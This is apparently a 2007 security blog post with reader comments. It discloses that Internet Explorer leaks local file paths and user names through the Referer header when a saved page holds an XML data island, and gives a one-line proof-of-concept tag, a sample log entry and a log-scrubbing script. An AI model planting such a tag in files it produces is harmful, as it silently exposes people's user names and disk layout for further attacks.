web application security lab

IE Sends Local Addresses in Referer Header

I’m not sure why it took me so long to get around to this, but I finally was able to test and verify that this works. In Internet Explorer, if you can get a user to save a file to disk and run it, it will disclose local drive information in the referrer without using JavaScript. Trev sent this one to me, and after some failed tests I got it working (still not quite sure why it didn’t work when I first tried it). Here’s the simple code:

<xml id="xml" src="http://my.site.com/"></xml>

Here’s a sample of what the log looked like when I tested it:

xxx.xxx.xxx.xxx - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 "file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

As you can see, not only does this give away local address information, but it can also give you sensitive information like the user name, and the location on the drive. That could easily be used to leverage further attacks, and to my knowledge there is no other way to do this without running JavaScript or some other active control. This completely fails in Firefox as it doesn’t support XML data islands. Nice find, Trev!
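
On the receiving server, this leak shows up as a file: Referer in the access log, as in the entry above. The following is an added example, not code from the original post, showing how a site operator could redact such values before logs are stored; the function names, the redaction marker and every sample line except the first are assumptions constructed for illustration.

```python
import re

# Apache/NCSA "combined" format; the last two quoted fields are Referer and User-Agent.
COMBINED = re.compile(
    r'^(?P<head>\S+ \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")  # bare Windows path, e.g. C:\...
REDACTED = "file:///[redacted]"  # marker chosen for this example


def is_local_referer(referer):
    """True when the Referer names a location on the visitor's own disk."""
    referer = referer.strip()
    return bool(DRIVE_PATH.match(referer)) or referer.lower().startswith("file:")


def scrub_line(line):
    """Return (line, changed), keeping the fact of a local referer but not the path."""
    line = line.rstrip("\n")
    m = COMBINED.match(line)
    if not m or not is_local_referer(m["referer"]):
        return line, False
    return f'{m["head"]} "{REDACTED}" "{m["agent"]}"', True


def scrub_log(lines):
    """Scrub every line; return (scrubbed_lines, number_of_redactions)."""
    out, hits = [], 0
    for line in lines:
        scrubbed, changed = scrub_line(line)
        out.append(scrubbed)
        hits += changed
    return out, hits


SAMPLE = [
    # First entry follows the log line shown in the post; the rest are constructed.
    'xxx.xxx.xxx.xxx - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 '
    '"file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '192.0.2.10 - - [25/Mar/2007:21:00:00 -0700] "GET /a HTTP/1.1" 200 512 '
    '"http://example.com/page" "Mozilla/5.0"',
    '192.0.2.11 - - [25/Mar/2007:21:00:05 -0700] "GET /b HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    scrubbed, hits = scrub_log(SAMPLE)
    print("\n".join(scrubbed), f"\n{hits} local referer(s) redacted")
```

Lines that do not parse as combined format, including any with escaped quotes inside a field, are passed through unchanged.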

10 Responses to “IE Sends Local Addresses in Referer Header”

  1. n00k Says:

    I just thought why one should use the xml tag to do it when there is something like background: url() in CSS.
    But this obviously doesn’t work. The browser sends an empty referer after saving it to hard disk. I tested it in Firefox, Opera and Konqueror (all Linux) and all the same result.

  2. n00k Says:

    Well, I just played some more with it and it seems that, at least Firefox, drops the referer when making requests from an HTTPS page. Probably a similar mechanism doesn’t allow sending the referer header from local files.

  3. Vinicius K-Max Says:

    Nice find!

  4. Awesome AnDrEw Says:

    Hasn’t this existed for a while though? I only ask because I know of several sites that prevent pages from submitting forms after they’ve been saved locally though I’m not sure whether they specifically rule out local areas, or whether it’s a general referer.

  5. RSnake Says:

    It’s probably the opposite. They require that the referrer exists and that it matches the website URL, and if it doesn’t then they bounce it.

  6. Tobmaster Says:

    Hehe, I’ve seen that some years ago. I managed the for a female actor.
    The funny thing was that one man she knew as a friend visited the page from his local startpage. The referrer was
    c:\…..\NAME_OF_THE_FRIEND\Desktop\hotSluts.html

    Well that was the end of the friendship ;).

  7. MustLive Says:

    Interesting technique, RSnake!

    It’s an information leak in Internet Explorer.

    As I tested, this method doesn’t work in IE 6, so it works only in IE 7.

  8. MustLive Says:

    I was hurried with my previous test. As I retested, IE 6 sends the referer with this method (with xml tag). It’s just my local web server configured to not log referers :-). And I wrote my own script and confirmed that this method works.

    So it works in both IE 6 and IE 7.

  9. RSnake Says:

    Thanks for testing, MustLive. It’s a pretty sexy method in some ways - especially if you combine it with my webbug technique: http://ha.ckers.org/webbug.html

  10. xssdude Says:

    It works if you save it on a local file, but then the referer really is that sensitive URL. However, I could not get it to work in IE7.0; the referer is your real referer. So I guess they fixed it. Anyone wanna double check?